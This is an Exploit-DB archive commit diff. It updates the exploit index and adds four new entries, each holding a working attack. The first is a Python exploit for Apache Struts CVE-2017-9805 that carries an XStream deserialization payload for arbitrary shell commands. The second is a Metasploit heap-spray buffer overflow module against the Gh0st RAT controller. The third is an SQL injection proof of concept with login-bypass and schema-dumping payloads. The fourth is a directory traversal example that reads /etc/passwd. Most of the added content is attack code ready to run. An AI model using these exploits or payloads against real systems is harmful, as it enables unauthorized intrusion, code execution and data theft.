DB: 2017-09-08

4 new exploits

Tor - Linux Sandbox Breakout via X11
Tor (Linux) - X11 Linux Sandbox Breakout
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
Gh0st Client - Buffer Overflow (Metasploit)

TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root
TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution
Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting
Online Invoice System 3.0 - SQL Injection

files.csv

@@ -9230,7 +9230,7 @@ id,file,description,date,author,platform,type,port
 42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
 42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
 42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
-42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
+42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15795,6 +15795,8 @@ id,file,description,date,author,platform,type,port
 42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
 42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
 42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
+42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
+42630,platforms/windows/remote/42630.rb,"Gh0st Client - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38202,7 +38204,7 @@ id,file,description,date,author,platform,type,port
 42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
 42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
 42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
-42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root",2017-05-30,"Simone Margaritelli",php,webapps,8181
+42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",php,webapps,8181
 42094,platforms/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",php,webapps,0
 42095,platforms/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,php,webapps,0
 42096,platforms/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,php,webapps,0
@@ -38408,3 +38410,5 @@ id,file,description,date,author,platform,type,port
 42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
 42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
 42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
+42628,platforms/php/webapps/42628.txt,"Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0
+42629,platforms/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0

platforms/linux/remote/42627.py

@@ -0,0 +1,97 @@
+# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
+# Google Dork: filetype:action
+# Date: 06/09/2017
+# Exploit Author: Warflop
+# Vendor Homepage: https://struts.apache.org/
+# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
+# Version: Struts 2.5 – Struts 2.5.12
+# Tested on: Struts 2.5.10
+# CVE : 2017-9805
+
+#!/usr/bin/env python3
+# coding=utf-8
+# *****************************************************
+# Struts CVE-2017-9805 Exploit
+# Warflop (http://securityattack.com.br/)
+# Greetz: Pimps & G4mbl3r
+# *****************************************************
+import requests
+import sys
+
+def exploration(command):
+
+	exploit = '''
+				<map>
+				<entry>
+				<jdk.nashorn.internal.objects.NativeString>
+				<flags>0</flags>
+				<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+				<dataHandler>
+				<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+				<is class="javax.crypto.CipherInputStream">
+				<cipher class="javax.crypto.NullCipher">
+				<initialized>false</initialized>
+				<opmode>0</opmode>
+				<serviceIterator class="javax.imageio.spi.FilterIterator">
+				<iter class="javax.imageio.spi.FilterIterator">
+				<iter class="java.util.Collections$EmptyIterator"/>
+				<next class="java.lang.ProcessBuilder">
+				<command>
+				<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
+				</command>
+				<redirectErrorStream>false</redirectErrorStream>
+				</next>
+				</iter>
+				<filter class="javax.imageio.ImageIO$ContainsFilter">
+				<method>
+				<class>java.lang.ProcessBuilder</class>
+				<name>start</name>
+				<parameter-types/>
+				</method>
+				<name>foo</name>
+				</filter>
+				<next class="string">foo</next>
+				</serviceIterator>
+				<lock/>
+				</cipher>
+				<input class="java.lang.ProcessBuilder$NullInputStream"/>
+				<ibuffer/>
+				<done>false</done>
+				<ostart>0</ostart>
+				<ofinish>0</ofinish>
+				<closed>false</closed>
+				</is>
+				<consumed>false</consumed>
+				</dataSource>
+				<transferFlavors/>
+				</dataHandler>
+				<dataLen>0</dataLen>
+				</value>
+				</jdk.nashorn.internal.objects.NativeString>
+				<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+				</entry>
+				<entry>
+				<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+				<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+				</entry>
+				</map>
+				'''
+
+
+	url = sys.argv[1]
+
+	headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
+			'Content-Type': 'application/xml'}
+
+	request = requests.post(url, data=exploit, headers=headers)
+	print request.text
+
+if len(sys.argv) < 3:
+	print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
+	print ('[*] Warflop - http://securityattack.com.br')
+	print ('[*] Greatz: Pimps & G4mbl3r')
+	print ('[*] Use: python struts2.py URL COMMAND')
+	print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
+	exit(0)
+else:
+	exploration(sys.argv[2])

platforms/php/webapps/42628.txt

@@ -0,0 +1,44 @@
+# Exploit Title: HRM - Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS
+# Date: 2017-09-05
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://workablezone.com
+# Software Link: https://codecanyon.net/item/hrm-workable-zone-ultimate-hr-system/20182372
+# Version: 1.2
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-05
+
+Product & Service Introduction:
+===============================
+Workable Zone is probably one of most customizable Human resourse(HR) management software for companies of all sizes.
+
+Technical Details & Description:
+================================
+
+Multiple Stored XSS vulnerabilities found.
+
+Directory Traversal vulnerability can disclose sensitive files.
+
+Proof of Concept (PoC):
+=======================
+
+Stored XSS:
+
+Logged as Employee:
+
+Write your payload on:
+Profile > Last Name
+
+Other vulnerable fields include: First Name, Contact Number
+
+Unauthenticated Directory Traversal:
+
+http://localhost.com/download?type=document&filename=../../../../../etc/passwd
+
+Credits & Authors:
+==================
+8bitsec - [https://twitter.com/_8bitsec]

platforms/php/webapps/42629.txt

@@ -0,0 +1,37 @@
+# # # # # 
+# Exploit Title: Online Invoice System 3.0 - SQL Injection
+# Dork: N/A
+# Date: 07.09.2017
+# Vendor Homepage: http://www.onlineinvoicesystem.com/
+# Software Link: http://www.onlineinvoicesystem.com/index_v3.html
+# Demo: http://www.onlineinvoicesystem.com/onlineinvoicesystem3/index.php
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# Bypass
+# http://localhost/[PATH]/index.php
+# User: 'or 1=1 or ''=' Pass: anything
+# User: anything Pass: 'or 1=1 or ''='
+# 
+# Sql
+# http://localhost/[PATH]/editclient.php?cid=[SQL]
+# -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
+# 
+# http://localhost/[PATH]/admin_invoice_print.php?id=[SQL]
+# 
+# http://localhost/[PATH]/edit_invoice.php?id=[SQL]
+# 
+# http://localhost/[PATH]/admin_invoice.php?id=[SQL]
+# Etc...
+# # # # #

platforms/windows/remote/42630.rb

@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zlib'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gh0st Client buffer Overflow',
+      'Description'    => %q{
+          This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
+      },
+      'Author'         => 'Professor Plum',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'AllowWin32SEH' => true
+        },
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => '',
+          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+        },
+      'Platform'       => 'win',
+      'DisclosureDate' => 'Jul 27 2017',
+      'Targets'        =>
+        [
+          ['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
+        ],
+      'Privileged'     => false,
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
+        Opt::RPORT(80)
+      ]
+    )
+  end
+
+  def make_packet(id, data)
+    msg = id.chr + data
+    compressed = Zlib::Deflate.deflate(msg)
+    datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
+  end
+
+  def validate_response(data)
+    if data.nil?
+      print_status('Server closed connection')
+      return false
+    end
+    if data.empty?
+      print_status('No response recieved')
+      return false
+    end
+    if data.size < 13
+      print_status('Invalid packet')
+      print_status(data)
+      return false
+    end
+    mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
+    if mag.index(datastore['MAGIC']) != 0
+      print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
+      return false
+    end
+    if pktlen != data.size
+      print_status('Packet size mismatch')
+      return false
+    end
+    msg = Zlib::Inflate.inflate(data[13..data.size])
+    if msg.size != msglen
+      print_status('Packet decompress failure')
+      return false
+    end
+    return true
+  end
+
+  def check
+    connect
+    sock.put(make_packet(101, "\x00")) # heartbeat
+    if validate_response(sock.get_once || '')
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Trying target #{target.name}")
+    print_status('Spraying heap...')
+    for i in 0..100
+      connect
+      sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
+      if not validate_response(sock.get_once)
+        disconnect
+        return
+      end
+    end
+
+    for i in 103..107
+      print_status("Trying command #{i}...")
+      begin
+        connect
+        sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
+        sock.put(sploit)
+        if validate_response(sock.get_once)
+          next
+        end
+        sleep(0.1)
+        break
+      rescue EOFError
+        print_status('Invalid')
+      end
+    end
+    handler
+    disconnect
+  end
+end